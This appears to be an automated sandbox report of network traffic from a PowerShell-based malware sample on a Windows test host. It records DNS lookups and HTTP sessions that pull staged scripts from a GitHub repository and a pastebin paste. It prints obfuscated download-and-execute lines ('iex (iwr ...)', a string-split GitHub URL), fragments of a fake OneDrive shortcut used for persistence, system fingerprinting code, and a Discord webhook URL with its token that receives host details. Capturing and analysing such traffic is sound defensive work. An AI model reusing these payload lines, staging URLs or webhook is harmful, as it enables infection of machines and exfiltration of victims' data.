                                                              Oct 15, 2024 16:01:34.008080959 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:34.008177042 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:34.010677099 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:39.060570955 CEST4985480192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:41.291757107 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.291807890 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.291883945 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.292376041 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.292390108 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.917975903 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.918132067 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.930530071 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.930547953 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.930814981 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.932030916 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.979407072 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:41.979540110 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:41.979554892 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:42.173263073 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:42.173352003 CEST44349984162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:42.173449039 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:42.175905943 CEST49984443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:47.389467001 CEST4990180192.168.2.9104.20.3.235
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Oct 15, 2024 16:00:59.864358902 CEST  52008        53         192.168.2.9  1.1.1.1
Oct 15, 2024 16:00:59.871705055 CEST  53           52008      1.1.1.1      192.168.2.9
Oct 15, 2024 16:01:17.863166094 CEST  58554        53         192.168.2.9  1.1.1.1
Oct 15, 2024 16:01:17.870660067 CEST  53           58554      1.1.1.1      192.168.2.9
Oct 15, 2024 16:01:19.976597071 CEST  65464        53         192.168.2.9  1.1.1.1
Oct 15, 2024 16:01:19.984771013 CEST  53           65464      1.1.1.1      192.168.2.9
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
Oct 15, 2024 16:00:59.864358902 CEST  192.168.2.9  1.1.1.1  0x975d    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:01:17.863166094 CEST  192.168.2.9  1.1.1.1  0xa1c5    Standard query (0)  pastebin.com               A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:01:19.976597071 CEST  192.168.2.9  1.1.1.1  0x9665    Standard query (0)  discord.com                A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address          Type            Class        DNS over HTTPS
Oct 15, 2024 16:00:59.871705055 CEST  1.1.1.1    192.168.2.9  0x975d    No error (0)  raw.githubusercontent.com  -      185.199.108.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:00:59.871705055 CEST  1.1.1.1    192.168.2.9  0x975d    No error (0)  raw.githubusercontent.com  -      185.199.110.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:00:59.871705055 CEST  1.1.1.1    192.168.2.9  0x975d    No error (0)  raw.githubusercontent.com  -      185.199.109.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:00:59.871705055 CEST  1.1.1.1    192.168.2.9  0x975d    No error (0)  raw.githubusercontent.com  -      185.199.111.133  A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:01:17.870660067 CEST  1.1.1.1    192.168.2.9  0xa1c5    No error (0)  pastebin.com               -      104.20.3.235     A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:01:17.870660067 CEST  1.1.1.1    192.168.2.9  0xa1c5    No error (0)  pastebin.com               -      172.67.19.24     A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:01:17.870660067 CEST  1.1.1.1    192.168.2.9  0xa1c5    No error (0)  pastebin.com               -      104.20.4.235     A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:01:19.984771013 CEST  1.1.1.1    192.168.2.9  0x9665    No error (0)  discord.com                -      162.159.137.232  A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:01:19.984771013 CEST  1.1.1.1    192.168.2.9  0x9665    No error (0)  discord.com                -      162.159.135.232  A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:01:19.984771013 CEST  1.1.1.1    192.168.2.9  0x9665    No error (0)  discord.com                -      162.159.136.232  A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:01:19.984771013 CEST  1.1.1.1    192.168.2.9  0x9665    No error (0)  discord.com                -      162.159.138.232  A (IP address)  IN (0x0001)  false
Oct 15, 2024 16:01:19.984771013 CEST  1.1.1.1    192.168.2.9  0x9665    No error (0)  discord.com                -      162.159.128.233  A (IP address)  IN (0x0001)  false

• raw.githubusercontent.com
• pastebin.com
• discord.com
Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.9  49757        185.199.108.133  80                7736  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 15, 2024 16:00:59.890140057 CEST  242                OUT        GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
Oct 15, 2024 16:01:00.516709089 CEST  561                IN         HTTP/1.1 301 Moved Permanently
    Connection: close
    Content-Length: 0
    Server: Varnish
    Retry-After: 0
    Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt
    Accept-Ranges: bytes
    Date: Tue, 15 Oct 2024 14:01:00 GMT
    Via: 1.1 varnish
    X-Served-By: cache-dfw-kdfw8210056-DFW
    X-Cache: HIT
    X-Cache-Hits: 0
    X-Timer: S1729000860.452538,VS0,VE0
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    Expires: Tue, 15 Oct 2024 14:06:00 GMT
    Vary: Authorization,Accept-Encoding


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.9  49854        104.20.3.235    80                7328  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 15, 2024 16:01:17.886178970 CEST  169                OUT        GET /raw/sA04Mwk2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: pastebin.com
    Connection: Keep-Alive
Oct 15, 2024 16:01:18.492137909 CEST  472                IN         HTTP/1.1 301 Moved Permanently
    Date: Tue, 15 Oct 2024 14:01:18 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Tue, 15 Oct 2024 15:01:18 GMT
    Location: https://pastebin.com/raw/sA04Mwk2
    Server: cloudflare
    CF-RAY: 8d3057222e07e76e-DFW
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
2           192.168.2.9  49862        185.199.108.133  80                7328  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 15, 2024 16:01:19.385906935 CEST  222                OUT        GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
Oct 15, 2024 16:01:19.998683929 CEST  541                IN         HTTP/1.1 301 Moved Permanently
    Connection: close
    Content-Length: 0
    Server: Varnish
    Retry-After: 0
    Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
    Accept-Ranges: bytes
    Date: Tue, 15 Oct 2024 14:01:19 GMT
    Via: 1.1 varnish
    X-Served-By: cache-dfw-kdfw8210142-DFW
    X-Cache: HIT
    X-Cache-Hits: 0
    X-Timer: S1729000880.936151,VS0,VE0
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    Expires: Tue, 15 Oct 2024 14:06:19 GMT
    Vary: Authorization,Accept-Encoding


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.9  49901        104.20.3.235    80                7368  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 15, 2024 16:01:25.937182903 CEST  169                OUT        GET /raw/sA04Mwk2 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: pastebin.com
    Connection: Keep-Alive
Oct 15, 2024 16:01:26.562858105 CEST  472                IN         HTTP/1.1 301 Moved Permanently
    Date: Tue, 15 Oct 2024 14:01:26 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Tue, 15 Oct 2024 15:01:26 GMT
    Location: https://pastebin.com/raw/sA04Mwk2
    Server: cloudflare
    CF-RAY: 8d3057547f434778-DFW
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
4           192.168.2.9  49911        185.199.108.133  80                7368  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 15, 2024 16:01:27.480190992 CEST  222                OUT        GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
Oct 15, 2024 16:01:28.116748095 CEST  541                IN         HTTP/1.1 301 Moved Permanently
    Connection: close
    Content-Length: 0
    Server: Varnish
    Retry-After: 0
    Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
    Accept-Ranges: bytes
    Date: Tue, 15 Oct 2024 14:01:28 GMT
    Via: 1.1 varnish
    X-Served-By: cache-dfw-kdfw8210129-DFW
    X-Cache: HIT
    X-Cache-Hits: 0
    X-Timer: S1729000888.050116,VS0,VE0
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    Expires: Tue, 15 Oct 2024 14:06:28 GMT
    Vary: Authorization,Accept-Encoding


Session ID: 0 | Source IP: 192.168.2.9 | Source Port: 49763 | Destination IP: 185.199.108.133 | Destination Port: 443 | PID: 7736 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:01:01 UTC | 242 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-15 14:01:01 UTC | 899 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 7088
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "6e4c41fcadb09e4c44f95bcd21966ae888aebf2d5f8b0bcd34ef015521114ea0"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 5B18:1AF8D8:AD9A7D:BD5271:670E73FF
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 14:01:01 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210104-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000861.392010,VS0,VE79
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 41c17bb6f8398b4c23d4ae01234082fcff43b3bb
Expires: Tue, 15 Oct 2024 14:06:01 GMT
Source-Age: 0
2024-10-15 14:01:01 UTC | 1378 | IN | Data Ascii: sleep 5#$googoogaagaa = "$env:tmp\DriverDiag.dll"$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $c
2024-10-15 14:01:01 UTC | 1378 | IN | Data Ascii: 0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84
2024-10-15 14:01:01 UTC | 1378 | IN | Data Ascii: 47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111
2024-10-15 14:01:01 UTC | 1378 | IN | Data Ascii: 10,239,17,150,194,212,216,83,133,24,17,73,2,0,0,9,0,0,160,89,0,0,0,49,83,80,83,237,48,189,218,67,0,137,71,167,248,208,19,164,115,102,34,61,0,0,0,100,0,0,0,0,31,0,0,0,22,0,0,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,40,0,67,0,58,0,92,0,87,0,105,0
2024-10-15 14:01:01 UTC | 1378 | IN | Data Ascii: 108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,0,0,0,0,0,0,57,0,0,0,49,83,80,83,177,22,109,68,173,141,112,72,167,72,64,46,164,61,120,140,29,0,0,0,104,0,0,0,0,72,0,0,0,127,105,194,224,217,88,248,75,138,252,26,60,66,49,4,72,0,0,0,0,0,0,0,0,0,0,0,0)$reconstru
2024-10-15 14:01:01 UTC | 198 | IN | Data Ascii: tput "Failed to send message. Error: $_"}#start powershell -windowstyle h -args 'iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)'}


Session ID: 1 | Source IP: 192.168.2.9 | Source Port: 49856 | Destination IP: 104.20.3.235 | Destination Port: 443 | PID: 7328 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:01:19 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2024-10-15 14:01:19 UTC | 397 | IN | HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 14:01:19 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 529
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d30572769c66bdd-DFW
2024-10-15 14:01:19 UTC | 139 | IN | Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 14:01:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a | Data Ascii: 0


Session ID: 2 | Source IP: 192.168.2.9 | Source Port: 49869 | Destination IP: 185.199.108.133 | Destination Port: 443 | PID: 7328 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:01:20 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-15 14:01:20 UTC | 901 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 7508
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 14:01:20 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210026-DFW
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1729000881.679485,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 8fc5609c245b2e1f44f5c6d8e40c353a4aae14e2
Expires: Tue, 15 Oct 2024 14:06:20 GMT
Source-Age: 86
2024-10-15 14:01:20 UTC | 1378 | IN | Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
2024-10-15 14:01:20 UTC | 1378 | IN | Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
2024-10-15 14:01:20 UTC | 1378 | IN | Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
2024-10-15 14:01:20 UTC | 1378 | IN | Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
2024-10-15 14:01:20 UTC | 1378 | IN | Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
2024-10-15 14:01:20 UTC | 618 | IN | Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


Session ID: 3 | Source IP: 192.168.2.9 | Source Port: 49868 | Destination IP: 162.159.137.232 | Destination Port: 443 | PID: 7736 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:01:20 UTC | 311 | OUT | POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/json
Host: discord.com
Content-Length: 215
Connection: Keep-Alive
2024-10-15 14:01:20 UTC | 215 | OUT | Data Ascii: { "content": "**user** has joined - crzcrpt\n----------------------------------\n**GPU:** MWC4YAN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
2024-10-15 14:01:20 UTC | 1253 | IN | HTTP/1.1 404 Not Found
Date: Tue, 15 Oct 2024 14:01:20 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1729000882
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=58B81X6XqTUALdaBPuB4CfjF62tBh2T0Sr80DNIqWF0vD33om5w65U%2B1ZoHFRUyaIQLxuxnEnHXXFUzgKDsk3wi%2FcXAmwm483Ymcd3W5z8wNY0GD4JvymBTg3vnt"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=c2021c9f6a79cf8578cacfe5f6ac2dc95557f6e5-1729000880; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=F0CDxSPHlGiABYxlu8vUvaOxRpKPK93DuSrUk_klzrI-1729000880780-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8d3057304f4d143f-DFW
2024-10-15 14:01:20 UTC | 45 | IN | Data Ascii: {"message": "Unknown Webhook", "code": 10015}


Session ID: 4 | Source IP: 192.168.2.9 | Source Port: 49905 | Destination IP: 104.20.3.235 | Destination Port: 443 | PID: 7368 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 14:01:27 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
2024-10-15 14:01:27 UTC | 397 | IN | HTTP/1.1 200 OK
Date: Tue, 15 Oct 2024 14:01:27 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 537
Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
Server: cloudflare
CF-RAY: 8d305759fd1bc86f-DFW
2024-10-15 14:01:27 UTC | 139 | IN | Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
2024-10-15 14:01:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a | Data Ascii: 0


                                                              Session ID: 5 | Source IP: 192.168.2.9 | Source Port: 49916 | Destination IP: 185.199.108.133 | Destination Port: 443 | PID: 7368 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-10-15 14:01:28 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              2024-10-15 14:01:28 UTC | 901 | IN | HTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 7508
                                                              Cache-Control: max-age=300
                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                              Content-Type: text/plain; charset=utf-8
                                                              ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: deny
                                                              X-XSS-Protection: 1; mode=block
                                                              X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                              Accept-Ranges: bytes
                                                              Date: Tue, 15 Oct 2024 14:01:28 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-dfw-kdal2120056-DFW
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 1
                                                              X-Timer: S1729000889.842877,VS0,VE1
                                                              Vary: Authorization,Accept-Encoding,Origin
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              X-Fastly-Request-ID: a776deeb177edc88db18d1785fe1588bdc20d2ec
                                                              Expires: Tue, 15 Oct 2024 14:06:28 GMT
                                                              Source-Age: 94
                                                              2024-10-15 14:01:28 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                              Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
